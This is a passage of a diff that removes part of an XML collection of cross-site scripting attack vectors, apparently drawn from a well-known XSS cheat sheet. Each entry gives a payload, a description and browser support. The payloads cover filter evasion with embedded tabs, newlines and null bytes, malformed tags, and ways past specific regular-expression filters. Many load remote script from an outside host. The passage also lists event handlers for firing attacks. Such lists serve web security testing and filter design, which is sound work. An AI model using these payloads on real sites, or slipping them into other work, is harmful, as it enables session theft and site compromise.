-		<name>Escaping JavaScript escapes</name>
-		<code>\&quot;;alert(&apos;XSS&apos;);//</code>
-		<desc>Escaping JavaScript escapes. When the application is written to output some user information inside of a JavaScript like the following: &lt;SCRIPT&gt;var a=&quot;$ENV{QUERY_STRING}&quot;;&lt;/SCRIPT&gt; and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this is gets injected it will read &lt;SCRIPT&gt;var a=&quot;&quot;;alert(&apos;XSS&apos;);//&quot;;&lt;/SCRIPT&gt; which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire.</desc>
-
-		<label>Character Encoding Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>End title tag</name>
-		<code>&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;</code>
-		<desc>This is a simple XSS vector that closes TITLE tags, which can encapsulate the malicious cross site scripting attack.</desc>
-		<label>Character Encoding Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>STYLE w/broken up JavaScript</name>
-		<code>&lt;STYLE&gt;@im\port&apos;\ja\vasc\ript:alert(&quot;XSS&quot;)&apos;;&lt;/STYLE&gt;</code>
-		<desc>STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts).</desc>
-
-		<label>Character Encoding Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Embedded Tab</name>
-		<code>&lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
-		<desc>Embedded tab to break up the cross site scripting attack.</desc>
-
-		<label>Embedded Character Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Embedded Encoded Tab</name>
-		<code>&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
-		<desc>Embedded encoded tab to break up XSS.  For some reason Opera does not allow the encoded tab, but it does allow the previous tab XSS and encoded newline and carriage returns below.</desc>
-
-		<label>Embedded Character Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Embedded Newline</name>
-		<code>&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
-		<desc>Embedded newline to break up XSS. Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work.</desc>
-
-		<label>Embedded Character Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Embedded Carriage Return</name>
-		<code>&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
-		<desc>Embedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I&apos;ve seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters).</desc>
-
-		<label>Embedded Character Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Multiline w/Carriage Returns</name>
-		<code>&lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;&apos;&#x0D;X&#x0D;S&#x0D;S&#x0D;&apos;&#x0D;)&#x0D;&quot;&#x0D;&gt;&#x0D;</code>
-
-		<desc>Multiline Injected JavaScript using ASCII carriage returns (same as above only a more extreme example of this XSS vector).</desc>
-		<label>Embedded Character Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Null Chars 1</name>
-		<code>perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out</code>
-
-		<desc>Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (http://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file.  Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example.</desc>
-		<label>Embedded Character Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Null Chars 2</name>
-		<code>perl -e &apos;print &quot;&amp;&lt;SCR\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\0IPT&gt;&quot;;&apos; &gt; out</code>
-
-		<desc>Here is a little known XSS attack vector using null characters.  You can actually break up the HTML itself using the same nulls as shown above. I&apos;ve seen this vector bypass some of the most restrictive XSS filters to date</desc>
-		<label>Embedded Character Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Spaces/Meta Chars</name>
-		<code>&lt;IMG SRC=&quot; &amp;#14;  javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
-		<desc>Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn&apos;t take into account spaces in the word &quot;javascript:&quot; - which is correct since that won&apos;t render- and makes the false assumption that you can&apos;t have a space between the quote and the &quot;javascript:&quot; keyword. The actual reality is you can have any char from 1-32 in decimal).</desc>
-
-		<label>Embedded Character Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Non-Alpha/Non-Digit</name>
-		<code>&lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
-		<desc>Non-alpha-non-digit XSS.  While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag.  The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace.  For example &quot;&lt;SCRIPT\s&quot; != &quot;&lt;SCRIPT/XSS\s&quot;</desc>
-
-		<label>Embedded Character Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Non-Alpha/Non-Digit Part 2</name>
-		<code>&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;</code>
-		<desc>Non-alpha-non-digit XSS part 2.  yawnmoth brought my attention to this vector, based on the same idea as above, however, I expanded on it, using my fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this does not apply to the grave accent char as seen here.</desc>
-		<label>Embedded Character Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>No Closing Script Tag</name>
-		<code>&lt;SCRIPT SRC=http://ha.ckers.org/xss.js</code>
-		<desc>In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don&apos;t actually need the &quot;&gt;&lt;/SCRIPT&gt;&quot; portion of this Cross Site Scripting vector. Firefox assumes it&apos;s safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn&apos;t affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they&apos;re not needed generally.</desc>
-
-		<label>Embedded Character Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Protocol resolution in script tags</name>
-		<code>&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;</code>
-		<desc>This particular variant was submitted by Lukasz Pilorz and was based partially off of Ozh&apos;s protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a &lt;/SCRIPT&gt; tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The &quot;.j&quot; is valid, regardless of the MIME type because the browser knows it in context of a SCRIPT tag.</desc>
-
-		<label>Embedded Character Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Half-Open HTML/JavaScript</name>
-		<code>&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;</code>
-		<desc>Unlike Firefox, the IE rendering engine doesn&apos;t add extra data to your page, but it does allow the &quot;javascript:&quot; directive in images. This is useful as a vector because it doesn&apos;t require a close angle bracket. This assumes that there is at least one HTML tag below where you are injecting this cross site scripting vector. Even though there is no close &gt; tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. See http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-mookhey/bh-us-04-mookhey-up.ppt for more info. It gets around the following NIDS regex:
-	/((\%3D)|(=))[^\n]*((\%3C)|&lt;)[^\n]+((\%3E)|>)/
-As a side note, this was also effective against a real world XSS filter I came across using an open ended &lt;IFRAME tag instead of an &lt;IMG tag.</desc>
-
-		<label>Embedded Character Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Double open angle brackets</name>
-		<code>&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;</code>
-		<desc>This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it&apos;s surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won&apos;t</desc>
-		<label>Embedded Character Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Extraneous Open Brackets</name>
-		<code>&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;</code>
-		<desc>(Submitted by Franz Sedlmaier http://www.pilorz.net/).  This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course).  The double slash comments out the ending extraneous bracket to supress a JavaScript error.</desc>
-
-		<label>Embedded Character Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Malformed IMG Tags</name>
-		<code>&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;</code>
-		<desc>Originally found by Begeek (http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes.  I assume this was originally meant to correct sloppy coding.  This would make it significantly more difficult to correctly parse apart an HTML tag.</desc>
-
-		<label>Embedded Character Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>No Quotes/Semicolons</name>
-		<code>&lt;SCRIPT&gt;a=/XSS/
-alert(a.source)&lt;/SCRIPT&gt;</code>
-		<desc>No single quotes or double quotes or semicolons.</desc>
-		<label>Embedded Character Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Event Handlers List 1</name>
-		<code>See Below</code>
-		<desc>Event Handlers that can be used in XSS attacks (this is the most comprehensive list on the net, at the time of this writing). Each one may have different results in different browsers. Thanks to Rene Ledosquet (http://www.secaron.de/) for the HTML+TIME updates:
-
--FSCommand() (execute from within an embedded Flash object)
-
--onAbort() (when user aborts the loading of an image)
-
--onActivate() (when object is set as the active element)
-
--onAfterPrint() (activates after user prints or previews print job)
-
--onAfterUpdate() (activates on data object after updating data in the source object)
-
--onBeforeActivate() (fires before the object is set as the active element)
-
--onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard (use the execCommand(&quot;Copy&quot;) function)
-
--onBeforeCut() (attacker executes the attack string right before a selection is cut)
-
--onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
-
--onBeforeEditFocus() (fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
-
--onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand(&quot;Paste&quot;) function)
-
--onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand(&quot;Print&quot;) function)
-
--onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
-
--onBegin() (fires immediately when the element&apos;s timeline begins)
-
--onBlur() (in the case where another popup is loaded and window loses focus)
-
--onBounce() (fires when the behavior property of the marquee object is set to &quot;alternate&quot; and the contents of the marquee reach one side of the window)
-
--onCellChange() (fires when data changes in the data provider)
-
--onChange() (fires when select, text, or TEXTAREA field loses focus and its value has been modified)
-
--onClick() (fires when someone clicks on a form)
-
--onContextMenu() (user would need to right click on attack area)
-
--onControlSelect() (fires when the user is about to make a control selection of the object)
-
--onCopy() (user needs to copy something or it can be exploited using the execCommand(&quot;Copy&quot;) command)
-
--onCut() (user needs to copy something or it can be exploited using the execCommand(&quot;Cut&quot;) command)
-
--onDataAvailible() (user would need to change data in an element, or attacker could perform the same function)
-
--onDataSetChanged() (fires when the data set exposed by a data source object changes)
-
--onDataSetComplete() (fires to indicate that all data is available from the data source object)
-
--onDblClick() (fires when user double-clicks a form element or a link)
-
--onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document)
-
--onDrag() (requires that the user drags an object)
-
--onDragEnd() (requires that the user drags an object)
-
--onDragLeave() (requires that the user drags an object off a valid location)
-
--onDragEnter() (requires that the user drags an object into a valid location)
-
--onDragOver() (requires that the user drags an object into a valid location)
-
--onDragDrop() (user drops an object (e.g. file) onto the browser window)
-
--onDrop() (fires when user drops an object (e.g. file) onto the browser window)
-
-</desc>
-		<label>Event Handlers</label>
-		<browser>Browser support:</browser>
-	</attack>
-	<attack>
-		<name>Event Handlers List 2</name>
-		<code>See Below</code>
-
-		<desc>-onEnd() (fires when the timeline ends.  This can be exploited, like most of the HTML+TIME event handlers by doing something like &lt;P STYLE=&quot;behavior:url(&apos;#default#time2&apos;)&quot; onEnd=&quot;alert(&apos;XSS&apos;)&quot;&gt;)
-
--onError() (loading of a document or image causes an error)
-
--onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object)
-
--onFilterChange() (fires when a visual filter completes state change)
-
--onFinish() (attacker could create the exploit when marquee is finished looping)
-
--onFocus() (attacker executes the attack string when the window gets focus)
-
--onFocusIn() (attacker executes the attack string when window gets focus)
-
--onFocusOut() (attacker executes the attack string when window loses focus)
-
--onHelp() (attacker executes the attack string when users hits F1 while the window is in focus)
-
--onKeyDown() (fires when user depresses a key)
-
--onKeyPress() (fires when user presses or holds down a key)
-
--onKeyUp() (fires when user releases a key)
-
--onLayoutComplete() (user would have to print or print preview)
-
--onLoad() (attacker executes the attack string after the window loads)
-
--onLoseCapture() (can be exploited by the releaseCapture() method)
-
--onMediaComplete() (when a streaming media file is used, this event could fire before the file starts playing)
-
--onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem)
-
--onMouseDown() (the attacker would need to get the user to click on an image)
-
--onMouseEnter() (fires when cursor moves over an object or area)
-
--onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again)
-
--onMouseMove() (the attacker would need to get the user to mouse over an image or table)
-
--onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again)
-
--onMouseOver() (fires when cursor moves over an object or area)
-
--onMouseUp() (the attacker would need to get the user to click on an image)
-
--onMouseWheel() (the attacker would need to get the user to use their mouse wheel)
-
--onMove() (user or attacker would move the page)
-
--onMoveEnd() (user or attacker would move the page)
-
--onMoveStart() (user or attacker would move the page)
-
--onOutOfSync() (interrupt the element&apos;s ability to play its media as defined by the timeline)
-
--onPaste() (user would need to paste or attacker could use the execCommand(&quot;Paste&quot;) function)
-
--onPause() (fires on every element that is active when the timeline pauses, including the body element)
-
--onProgress() (attacker would use this as a flash movie was loading)
-
--onPropertyChange() (user or attacker would need to change an element property)
-
--onReadyStateChange() (user or attacker would need to change an element property)
-</desc>
-		<label>Event Handlers</label>
-
-		<browser>Browser support:</browser>
-	</attack>
-	<attack>
-		<name>Event Handlers List 3</name>
-		<code>See Below</code>
-		<desc>-onRepeat() (fires once for each repetition of the timeline, excluding the first full cycle)
-
--onReset() (fires when user or attacker resets a form)
-
--onResize() (user would resize the window; attacker could auto initialize with something like: &lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;)
-
--onResizeEnd() (user would resize the window; attacker could auto initialize with something like: &lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;)
-
--onResizeStart() (user would resize the window; attacker could auto initialize with something like: &lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;)
-
--onResume() (fires on every element that becomes active when the timeline resumes, including the body element)
-
--onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
-
--onRowEnter() (user or attacker would need to change a row in a data source)
-
--onRowExit() (user or attacker would need to change a row in a data source)
-
--onRowDelete() (user or attacker would need to delete a row in a data source)
-
--onRowInserted() (user or attacker would need to insert a row in a data source)
-
--onScroll() (user would need to scroll, or attacker could use the scrollBy() function)
-
--onSeek() (fires when the timeline is set to play in any direction other than forward)
-
--onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(&quot;SelectAll&quot;);)
-
--onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(&quot;SelectAll&quot;);)
-
--onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(&quot;SelectAll&quot;);)
-
--onStart() (fires at the beginning of each marquee loop)
-
--onStop() (user would need to press the stop button or leave the webpage)
-
--onSynchRestored() (user interrupts the element&apos;s ability to play its media as defined by the timeline to fire)
-
--onSubmit() (requires attacker or user submits a form)
-
--onTimeError() (fires when user or attacker sets a time property, such as &quot;dur&quot;, to an invalid value)
-
--onTrackChange() (fires when user or attacker changes track in a playList)
-
--onUnload() (fires when the user clicks any link or presses the back button or attacker forces a click)
-
--onURLFlip() (fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
-
--seekSegmentTime() (locates the specified point on the element&apos;s segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)
-
-</desc>
-		<label>Event Handlers</label>
-		<browser>Browser support:</browser>
-	</attack>
-	<attack>
-		<name>Evade Regex Filter 1</name>
-		<code>&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
-
-		<desc>For performing XSS on sites that allow &quot;&lt;SCRIPT>&quot; but don&apos;t allow &quot;&lt;SCRIPT SRC...&quot; by way of the following regex filter:
-	/&lt;script[^&gt;]+src/i</desc>
-		<label>XSS w/HTML Quote Encapsulation</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Evade Regex Filter 2</name>
-		<code>&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
-		<desc>For performing XSS on sites that allow &quot;&lt;SCRIPT>&quot; but don&apos;t allow &quot;&lt;SCRIPT SRC...&quot; by way of a regex filter:
-	/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i
-
-(this is an important one, because I&apos;ve seen this regex in the wild)</desc>
-
-		<label>XSS w/HTML Quote Encapsulation</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Evade Regex Filter 3</name>
-		<code>&lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
-		<desc>Another XSS to evade this regex filter:
-	/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i</desc>
-
-		<label>XSS w/HTML Quote Encapsulation</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Evade Regex Filter 4</name>
-		<code>&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
-		<desc>Yet another XSS to evade the same filter:
-	/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i
-The only thing I&apos;ve seen work against this XSS attack if you still want to allow &lt;SCRIPT&gt; tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow &lt;SCRIPT&gt; tags)</desc>
-
-		<label>XSS w/HTML Quote Encapsulation</label>
